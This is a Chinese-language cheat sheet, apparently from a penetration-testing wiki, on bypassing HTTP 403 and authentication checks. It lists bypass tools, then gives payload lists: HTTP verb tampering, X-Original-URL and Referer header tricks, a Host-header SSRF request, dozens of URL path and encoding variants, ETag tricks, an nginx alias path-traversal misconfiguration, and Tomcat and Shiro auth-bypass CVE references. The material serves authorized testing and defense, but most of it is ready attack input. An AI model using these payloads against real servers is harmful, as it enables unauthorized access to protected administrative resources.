绕过访问

---

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

---

相关文章

• Tips : Bypass Etag If-None-Match

• 记一次403绕过技巧

相关案例

• Bypassing 403 Protection To Get Pagespeed Admin Access

• How 403 Forbidden Bypass got me NOKIA Hall Of Fame (HOF)

相关工具

• iamj0ker/bypass-403 - 一个用来绕过403报错的简单脚本

• Dheerajmadhukar/4-ZERO-3 - 403/401 Bypass Methods + Bash Automation

• devploit/dontgo403 - Tool to bypass 40X response codes.

• ffffffff0x/403-fuzz - 针对 403 页面的 fuzz 脚本

• sting8k/BurpSuite_403Bypasser - Burpsuite Extension to bypass 403 restricted directory

• lobuhi/byp4xx - Pyhton script for HTTP 40X responses bypassing. Features: Verb tampering, headers, #bugbountytips tricks and 2454 User-Agents.

• ivan-sincek/forbidden - Bypass 4xx HTTP response status codes and more. Based on PycURL.

相关资源

• GrrrDog/weird_proxies - Reverse proxies cheatsheet
• CHYbeta/OddProxyDemo

Tips

• protocol based bypass

  http://web.com/admin    # ===> 403
  https://web.com/admin   # ===> 200

• method based bypass

  OPTIONS
  GET
  HEAD
  POST
  PUT
  DELETE
  TRACE
  TRACK
  CONNECT
  PROPFIND
  PROPPATCH
  MKCOL
  COPY
  MOVE
  LOCK
  UNLOCK
  VERSION-CONTROL
  REPORT
  CHECKOUT
  CHECKIN
  UNCHECKOUT
  MKWORKSPACE
  UPDATE
  LABEL
  MERGE
  BASELINE-CONTROL
  MKACTIVITY
  ORDERPATCH
  ACL
  PATCH
  SEARCH
  ARBITRARY

• HTTP Header based bypass

  GET /admin HTTP/1.1
  Host: web.com   # ===> 403
  
  GET /anything HTTP/1.1
  Host: web.com
  X-Original-URL: /admin  # ===> 200
  
  GET /anything HTTP/1.1
  Host: web.com
  Referer: https://web.com/admin  # ===> 200
  
  GET https://qq.com HTTP/1.1
  Host: web.com   # ===> SSRF

• url character/parameter bypass

  /admin/panel            # ===> 403
  /admin/monitor          # ===> 200
  
  /admin/monitor/;panel   # ===> 302

  web.com/admin           # ===> 403
  
  web.com/ADMIN           # ===> 200
  web.com/admin/          # ===> 200
  web.com//admin/         # ===> 200
  web.com/admin;          # ===> 200
  web.com/admin/.         # ===> 200
  web.com/admin/../admin  # ===> 200
  web.com/admin../admin   # ===> 200
  web.com/../admin        # ===> 200
  web.com//admin//        # ===> 200
  web.com/./admin/./      # ===> 200
  web.com/./admin/..      # ===> 200
  web.com/;/admin         # ===> 200
  web.com/.;/admin        # ===> 200
  web.com//;//admin       # ===> 200
  web.com/admin.json      # ===> 200(ruby)
  
  web.com/%2f/admin/      # ===> 200
  web.com/%2e/admin       # ===> 200
  web.com/%252e/admin     # ===> 200
  web.com/%ef%bc%8fadmin  # ===> 200
  
  web.com/admin           # ===> 302
  web.com/test/admin      # ===> 200
  web.com/admin..;/       # ===> 200

• 304 bypass

  GET /admin HTTP/1.1
  Host: target.com
  If-None-Match: W/"123-dASdsa2d2212e4d21"
  
  GET /admin HTTP/1.1
  Host: target.com

  If-None-Match: W/"123-dASdsa2d2212e4d21"
  
  If-None-Match: W/"null"
  If-None-Match: W/"123-dASdsa2d2212e4d21" a

---

nginx

相关文章

• Common Nginx Misconfiguration leads to Path Traversal - 当 nginx 配置不当时,可使用类似 /test../private/secret.html 进行目录穿越
• 案例｜轻松绕过你的Nginx（上篇）
• 终极案例｜轻松绕过你的Nginx（下篇）

root /var/www/html/public;

location /test/ {
    alias /var/www/html/public/;
}

✔  /test/public.html
❌  /test../private/secret.html

root /var/www/html/public;

location /test {
    alias /var/www/html/public/;
}

✔  /test/public.html
✔  /test../private/secret.html

---

Tomcat

相关文章

• CVE-2020-5902——关于;号绕过认证技巧总结
• tomcat对url请求中的特殊字符处理 分析

---

shiro

SHIRO-682 & CVE-2020-1957 | Shiro 权限绕过漏洞

• 相关文章

  • Shiro 权限绕过漏洞分析（CVE-2020-1957）

SHIRO-782 & CVE-2020-11989

• 相关文章

  • Apache Shiro权限绕过漏洞分析(CVE-2020-11989)
  • Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989)'
  • CVE-2020-11989：Apache Shiro权限绕过复现
  • 记一次Apache Shiro权限绕过实战
  • 记一次前台任意文件下载漏洞挖掘

CVE-2020-17523

• 相关文章

  • Apache Shiro身份认证绕过漏洞复现(CVE-2020-17523)
  • jweny/shiro-cve-2020-17523